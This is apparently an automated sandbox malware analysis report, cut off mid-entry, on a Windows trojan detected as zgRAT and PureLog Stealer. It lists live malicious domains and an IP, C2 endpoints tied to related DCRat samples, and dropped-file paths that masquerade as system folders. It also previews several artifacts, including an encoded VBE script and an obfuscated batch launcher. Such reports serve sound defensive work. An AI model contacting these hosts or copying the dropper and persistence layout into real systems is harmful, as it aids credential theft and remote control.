http://595506cm.n9shka.top	lsass.exe, 0000000A.00000002.1889556610.0000000002B36000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.1889556610.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.00000000037F4000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.0000000003623000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000325D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000342E000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.00000000039E1000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ComponentBrowserruntimeHostNet.exe, 00000004.00000002.1759739963.000000000388F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.1889556610.0000000002B36000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.0000000003623000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000325D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.44.238.250	595506cm.n9shka.top	France		49434	HARMONYHOSTING-ASFR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569639
Start date and time:	2024-12-06 01:41:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	63
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Qsi7IgkrWa.exe renamed because original name is a hash value
Original Sample Name:	6296cf36bbbbe91b8ff186d18a08afa3.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@106/93@2/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target lsass.exe, PID 1368 because it is empty
Execution Graph export aborted for target lsass.exe, PID 4128 because it is empty
Execution Graph export aborted for target lsass.exe, PID 5144 because it is empty
Execution Graph export aborted for target lsass.exe, PID 5804 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:42:18	API Interceptor	10x Sleep call for process: lsass.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37.44.238.250	4Awb1u1GcJ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	143840cm.nyashteam.ru/DefaultPublic.php
	s5duotgoYD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
	QMT2731i8k.exe	Get hash	malicious	DCRat	Browse	117813cm.n9shteam.in/ExternalRequest.php
	EQdhBjQw4G.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
	3AAyq819Vy.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
	HcEvQKWAu2.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
	k1iZHyRK6K.exe	Get hash	malicious	DCRat	Browse	452132cm.n9shteam2.top/Processdownloads.php
	FuWRu2Mg82.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	rollsroys.top/externaljsapisql.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HARMONYHOSTING-ASFR	4Awb1u1GcJ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	http://clavity.me	Get hash	malicious	Unknown	Browse	185.157.247.125
	s5duotgoYD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	QMT2731i8k.exe	Get hash	malicious	DCRat	Browse	37.44.238.250
	EQdhBjQw4G.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	3AAyq819Vy.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	HcEvQKWAu2.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	k1iZHyRK6K.exe	Get hash	malicious	DCRat	Browse	37.44.238.250
	FuWRu2Mg82.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	ASCII text, with very long lines (357), with no line terminators
Category:	dropped
Size (bytes):	357
Entropy (8bit):	5.762064313099226
Encrypted:	false
SSDEEP:	6:EmRULofdgzCeSvrySIUxMJSkBawqSAiZFrET1R4RLVgphWHjEP+C:E+GuNz5FlSAAFrYgRyPWD6+C
MD5:	90529183B0883943D36C699E92762A34
SHA1:	CD7BE0EA557DE5B1820DB222FB8DFC14E325EB82
SHA-256:	52950C2F59792785DD11D16546D000938B10568E4F63A8A4C80F8086D7440D85
SHA-512:	25FCBFA6B176A1D40ABF688ABC1A39E1A2B48E86DFF947792C96CC17594893616BC2D9C4364CFC602BEE0195EE12281A134013D78C1E81E9289FB76101D301A0
Malicious:	false
Preview:	p9TnNTWPvhC6dr4SCHcuSfgbB1n19Q4cnjcchjg5mBtK67b3dvO7XoDJc1lWpfQfnkS3ObudlgIRwWfDZtYNC6E8gT9p7JQHvOgVpipBAuW0gwXGWi65HCcrfTW4bEgbQAghzJY0EWMRkOcu63TYNU9swzzVMuj6O4kfPzQMKF1uzKGR1l8ivHO6AxvATCoTxQDqn6eGnHOHcP2ltidlwBLGpnecEQ3Hbi7jHan5G14n3Hdv5JRvjDgwF6BAbCBXNGp3STeS4he4GhNhJtg58HiXCKdLZneD0gawbkcmp81Bilpisd0sgGYGiS1HzT3QDbEjHaFjQ3PAQgyaf4c5xvhtITOJsVwVFk7Hg

C:\HypercontainerServerhostDll\7695831dfd402e

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	224
Entropy (8bit):	5.631833593103566
Encrypted:	false
SSDEEP:	3:pHTEWAHrElskbRQPaE9D/6qcqv0eUPyUGlyw59SrHSu9VU1FyXV42LvIckcXIx4h:pgFHngmn9j6nK0wOPXfQa52BXvr4es
MD5:	3AA8DF7BD1BF125FAF9C41F7812A3C23
SHA1:	56599FB88F0B32FD3137BB1C9C470972B212EB0F
SHA-256:	D6BFA336DD1E7D412C1A9F51BFC361FC8409C046116F3764866ED7BC26097BE3
SHA-512:	99069916BD2F77B8493432C01FF9E69B9AB04966D7047628244A1597CB98B014A45F9FF8FE409F3ECC0C54A5E24CA1B4D945727AEABF7A95F29DEF33993DE11B
Malicious:	false
Preview:	yO0AbiASbWOOOvmQEsnMxbsaVFnxEealWQOrAhl4fNEA58qwWNPWhEaXfZoV5MO65m27h5QhHsqjWsfXZ1b1OEES01Lk3Q9S9HETFsOb7sOyX0Ax4R6DvWr0hkHptpo1tXkPnMRqm94gzQ490XqmT5hmaNvfljrREXEAQvKs9PbwcLBRqIzW9Bhx08yZawFDRmbbL3tFM7mDevJOMeyctVRC0RKS6uRM

C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat

Download File

Process:	C:\Users\user\Desktop\Qsi7IgkrWa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	112
Entropy (8bit):	5.037428017506391
Encrypted:	false
SSDEEP:	3:QIeZN+3kuEEM0XXR+EmThbikiXiQBHGvn:yZN1u+IUbhrln
MD5:	BFBF412350FA794765180EB365D663FB
SHA1:	04021BA70227E0A5F7CF29C7B85D0190F82D7F37
SHA-256:	B7A5DA4F22C70794C60B65E06512F5F3F9E2E2803E98A99567AB859FD56F0F60
SHA-512:	23B6B4429E43F8FE66B0E37908D1A0580A60938281928B7B98C9FC8FB531AB7C61BC426514990B6E97FA6A95D0509E8934B77480725C748ECEC20997E4371139
Malicious:	false
Preview:	%VrlZwI%%EzMOpZ%..%KickhhvmNvewS%"C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe"%WcHNbudbck%

C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe

Download File

Process:	C:\Users\user\Desktop\Qsi7IgkrWa.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1916928
Entropy (8bit):	7.5383466252302025
Encrypted:	false
SSDEEP:	24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
MD5:	BD5DF5DC5869453A2501A80C6FC937F4
SHA1:	CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
SHA-256:	C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
SHA-512:	F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{\|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z~....(R... .... .... ....s....~....(V...

C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe

Download File

Process:	C:\Users\user\Desktop\Qsi7IgkrWa.exe
File Type:	data
Category:	dropped
Size (bytes):	254
Entropy (8bit):	6.011491059508776
Encrypted:	false
SSDEEP:	6:GmwqK+NkLzWbHK/818nZNDd3RL1wQJRLIL7puQedLaiWEs:GLMCzWLKG4d3XBJl275edLaiC
MD5:	FCE58AB003F289BC419D62CE02F832FB
SHA1:	DFA69AE2CE984C05356FBA2074172BCE822ED518
SHA-256:	F7A2151AA23631BDE2FF93435F0209EC2A3F8F2AFF2B9024F75B5E20A70677B9
SHA-512:	9284E6ED46B9E60329ACB0F4829170FC047FF12990D7B7D8A0E0B739B59905A65318DDE0F95992B33A930211BD20D1759E745BE6A1F4FA2E58B94F58B514171F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^5QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJCza+MmW.Ymrx.Dj+M\n.4W/D9V^zz;GX3DXRrKxLTgX2c_ef056{_/ffopuCWeUKGyk.cS25&%4"c 4mYES,!~,Wl^/+m0kAAA==^#~@.

C:\HypercontainerServerhostDll\TextInputHost.exe

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1916928
Entropy (8bit):	7.5383466252302025
Encrypted:	false
SSDEEP:	24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
MD5:	BD5DF5DC5869453A2501A80C6FC937F4
SHA1:	CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
SHA-256:	C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
SHA-512:	F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\HypercontainerServerhostDll\TextInputHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HypercontainerServerhostDll\TextInputHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HypercontainerServerhostDll\TextInputHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HypercontainerServerhostDll\TextInputHost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{\|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z~....(R... .... .... ....s....~....(V...

C:\Program Files (x86)\Windows Media Player\Network Sharing\6e82e733a89f1e

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	ASCII text, with very long lines (784), with no line terminators
Category:	dropped
Size (bytes):	784
Entropy (8bit):	5.879956698453127
Encrypted:	false
SSDEEP:	24:0TQQUo75Br2pdg2PjJm3DV7IcN+FZx0W8w:u9dim2PCh7Ici8w
MD5:	80A4EFD592F82E36B1EDAB3E106D30F4
SHA1:	1A4B06D39E85C9233856F959C38472D4B72A87ED
SHA-256:	64FD5E566A314E951E30B2ACBC24B32CD8DEF6F20E09BD3E9CD5B19DB4F72633
SHA-512:	20BFE8BCE207463AA69EE17EEA992CB0BF1D2E3487F65A8EEAF06BF63AAB780D5281F478A771C47BC50D7C445B97FEBF62E2D8754DB6E5EB2D0FA6CB95E8A93F
Malicious:	false
Preview:	ZuJBZdSEykN67mT6VZl4taIbqa3GQTfmYCD9LPnX8FdWhUOiEifU8LC8lrV9kMxfEki5iUuFvO5o6v4VLUCsxKoN9FXe4owwR8R6wTAuxaiuPYB0x9xPKEr46V5d6PKHbIW8e7j1US4Xl37kDhr50hmMQXAbXgxhPbTHCCVzZ651KTSCXVZZiPQ4gJsH6IdxeWIKk0iAL1f3luC6F8DCHX9AKYk2UO3RcHXxLHbhwYOrtWSvHvB8FbqHXIALPqq68ObeXPv7gfPsJRQxGzviM4MBbPZDHQSGsRtf5xX1AEcjL78G1MEZ4HuECaDI0rzQNJA2iu1Sb4iIbmzdRTL4L2LkhpdfuPBSOMVC6FhHUw8AimmZlj0hg4EV7aV3QWiL3Q3PQwgLvEkZ4LB4DE4KZdwUHAFguo07NwHSsWIyCpvcUpbwYa0McXwZdjIPrAaGNmLHDsMq6FIurU9bjTIUynf0AsyJO2GCOpOreTspOJQXPCrJjqqY1GSjHUHV3CbD8FfCFR7QkcGoXHl7ApkiMsKIXokJMWwLsMYJgoERtZxZ9nM9tJUOb31Q4XpbrxDNq46KtbaWlSyw4vItblZCChuyVHPJ9mk5WjtFqBPSs8nIEEWJO59FXALIKHymLRW8s2ZUBDCZVHUE3luQvG4EneiVYk5jNnGblpaLoBHL2juQqHOiXi0FWRVNUE5bHdMrA2cOKilt9sMDuSpRVWMpwBFTUM1kGpDYWCPyoAXz6HGnFRdCZoFvRh49xI47rBnTpxrrC0mV8Xsp4bOC

C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1916928
Entropy (8bit):	7.5383466252302025
Encrypted:	false
SSDEEP:	24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
MD5:	BD5DF5DC5869453A2501A80C6FC937F4
SHA1:	CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
SHA-256:	C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
SHA-512:	F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{\|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z~....(R... .... .... ....s....~....(V...

C:\Program Files\Microsoft Office 15\ClientX64\6e82e733a89f1e

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	ASCII text, with very long lines (629), with no line terminators
Category:	dropped
Size (bytes):	629
Entropy (8bit):	5.890331261229539
Encrypted:	false
SSDEEP:	12:SBoVFEr4xpd6WKvMhC+A7aoX/tUjROLA92ehZRO6pEMIBBrmWP1xSwy/dupOVIDn:SBoVFFx38vMhBRLjUM2O79EMIBdtP1xR
MD5:	F354F17EA229CAE6F76D7280DA6EBF17
SHA1:	BFED77633BABAD48EB2A7F1E4E93615596367434
SHA-256:	F93DA361BF50D0CDEA0F03C6C5E6ADF73BB0F3CA924BCEF50313BA2F3A83C721
SHA-512:	A908D60F53E77B48BE9A47469EB8A1D6378D32DFB9F13C88656998EB48401B4B8CF851E698C6B13BEB2C1EA6EBDCFC7DB7D803FA76897620228939D3A26A7E9A
Malicious:	false
Preview:	0Y0Bdam517dR3VbxM605G44pir3ZcKigU42udNqSs1eIHqNLooFbZgf6dKcwgMcqY679crU8PiMPZwi2dsvyEGHyY6QSu4vgYytKsOt6UGL0TQhqmjSyaolSzJlgaBOVxq1lDXJP8ze74QeIZkpKl6FtMbVjmMfS20DnZ5nPZDzlKoXjodH0VDu0kHYlCkmvTLFEM0td6auhGdjiDv5JFp7yFNDRgBNzbDS8iSXxtn34TMtGh0iQpcpnOQ89xb65N5GCLk9uYHZcwCf3d6uqd7K8YouRUYASr7rYGq561x1hDN1MvFf1rQcQuHog0raAGHuyUHwwBxzpFm5KxigO2Jlbfbn9BYGJX0a5dD1oTsz4awKILesRLLH7gTS3dxumqqSOL9rur15KTrAsQfxhqy7LsdZJu7Kg7NNue56Mx8kUQ7oyTjn89N61sGgsjhAtqYMFdPNUiltrNm5uyk0KUMguRVBYZOmQ81n1viVDVSZYdOnGLv38qzYe2cxINz5U8dtW8D9QPwyCxIQDr5NoUnjIcJ9TvN0gWEZAeRHHvnt3AWquMuaRlR9V4l3zEqeC6SpssPjayG2r4pHFdPHAwi4FEEG3XSCFIq7sr7B6LAdfYSbOdxWzi

C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1916928
Entropy (8bit):	7.5383466252302025
Encrypted:	false
SSDEEP:	24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
MD5:	BD5DF5DC5869453A2501A80C6FC937F4
SHA1:	CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
SHA-256:	C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
SHA-512:	F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{\|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z~....(R... .... .... ....s....~....(V...

C:\Program Files\Windows Portable Devices\6e82e733a89f1e

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	138
Entropy (8bit):	5.676914721343531
Encrypted:	false
SSDEEP:	3:03Unx3DyUKidupFfLEN+KIrbNh1JWVBW03mNyEI++aaKcWrXqEpLW/:7nFDipiTIrRZYDHW1pL6
MD5:	A896CFD8AEE5834C56DB2CE8368D6A5D
SHA1:	F310D43C45B37346DFE9CEB87BE5923085436007
SHA-256:	05375D4F470EE3D1DDC8B467F97D8A2A11BDE89D266ABBAA2EEF4787C4840C62
SHA-512:	CC5AECAC23B09F933A6A3A134780D33E363000523FF5C8FD8AA496E0F9F11D3F9EB07F37661DC3F327CA70B8B5193539C9C008DA3BB9BEF12A1B4F2D38546475
Malicious:	false
Preview:	PAgFZH5ew8Skw9iBuw4zPEW41O2zLtWq2jx0GPiPxKHc5c7znazfM92KomNLPFTDmmsNMs5eNpBE638ZRCMu30d2qmLdCX9r1E0Tutn4fVSh7xNuoy3N2iJvIzgjgbczqTM2DoohZR

C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1916928
Entropy (8bit):	7.5383466252302025
Encrypted:	false
SSDEEP:	24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
MD5:	BD5DF5DC5869453A2501A80C6FC937F4
SHA1:	CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
SHA-256:	C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
SHA-512:	F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{\|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z~....(R... .... .... ....s....~....(V...

C:\Recovery\6203df4a6bafc7

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	ASCII text, with very long lines (884), with no line terminators
